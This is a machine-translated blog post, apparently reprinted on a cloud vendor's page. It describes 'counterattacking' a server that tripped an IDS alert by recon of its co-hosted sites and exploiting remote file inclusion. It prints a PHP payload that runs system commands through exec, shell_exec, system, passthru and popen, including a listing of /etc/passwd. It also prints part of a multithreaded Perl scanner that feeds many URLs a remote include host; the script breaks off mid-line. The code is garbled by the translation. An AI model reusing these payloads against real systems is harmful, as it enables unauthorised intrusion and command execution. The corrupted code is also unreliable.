Reverse osmosis forensics

Source: Internet
Author: User

Reprinted fromXiliaoxixiFinal editingZero x 255

From: Tiger

I. Cause

One day, IDS sends an alert and apache is under attack. Although it was not successful, it cannot be so. I have to see which kind of 'fairy 'dares to move on the Earth at the age of too.

Ii. counterattack

According to the source IP detection, only ports 22 and 80 are opened. It can be seen that the other side is also a web server, which is likely a stepping stone. In any case, take it first!

Generally, a web server has multiple virtual spaces, which makes it difficult to ensure that the code of each website is secure. Therefore, for servers with multiple websites, it is almost easy to get a webshell.

1. Spying

Google is certainly used for spying on website information.

First comeWww.myipneighbors.comQuery the domain name corresponding to the server IP address;

Use google to search for inurl: domain.com and check the obtained pages one by one.

But there are too many domain names corresponding to this IP address. According to the attack method of the IP address, it seems to be looking for the RFI (remote file include) vulnerability. OK. If this server is a stepping stone, it may also be attacked due to the RFI vulnerability. Let's start with the RFI vulnerability.

Put all the server URLs collected by google into a text file. Then we can quickly detect these links through programs. Not much nonsense. Go to the Code:

1. Rfi.txt

This is actually a php code. You can use this code to test whether the php script of the target website will execute this code.

<? Php

// Through the unpack function of php, if 2a73637266621374392a is output on the page, the php code is executed!

$ Pcode = unpack (H *, * scrfcxt9 *);

Echo $ pcode [1];

// Phpinfo ();

Echo <br>;

// Run the ls/et */pas * d command. If/etc/passwd is returned, the php code can execute the system command.

Echo execute ("ls/et */pas * d ");

// The phpspy code is used here, so I am too lazy to write it. That is to say, a function that calls php to execute system commands one by one. If any function succeeds, it is used for execution.

Function execute ($ cfe ){

$ Res =;

If ($ cfe ){

If (function_exists (exec )){

@ Exec ($ cfe, $ res );

$ Res = join ("", $ res );

} Elseif (function_exists (shell_exec )){

$ Res = @ shell_exec ($ cfe );

} Elseif (function_exists (system )){

@ Ob_start ();

@ System ($ cfe );

$ Res = @ ob_get_contents ();

@ Ob_end_clean ();

} Elseif (function_exists (passthru )){

@ Ob_start ();

@ Passthru ($ cfe );

$ Res = @ ob_get_contents ();

@ Ob_end_clean ();

} Elseif (@ is_resource ($ f = @ popen ($ cfe, "r "))){

$ Res =;

While (! @ Feof ($ f)){

$ Res. = @ fread ($ f, 1024 );

}

@ Pclose ($ f );

}

}

Return $ res;

}

?>

2. Rfiscan. pl

This is a batch detection code that allows you to quickly locate vulnerability URLs.

#! /Usr/bin/perl-w

Use LWP: Simple; # use lwp to obtain url content and determine

Use Parallel: ForkManager; # use forkmanager for fast multi-thread execution

$ | = 1;

My $ urlfile = shift | die need list !;

My @ urllist;

My $ Forkno = 100;

My $ count = 0;

# Set Remote File Inclusion location

My $ phpurl = 'HTTP: // www.mysite.com/rfc.txt? ';

My $ stime = time;

# Open a url list file

Open (URLL, "$ urlfile"

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.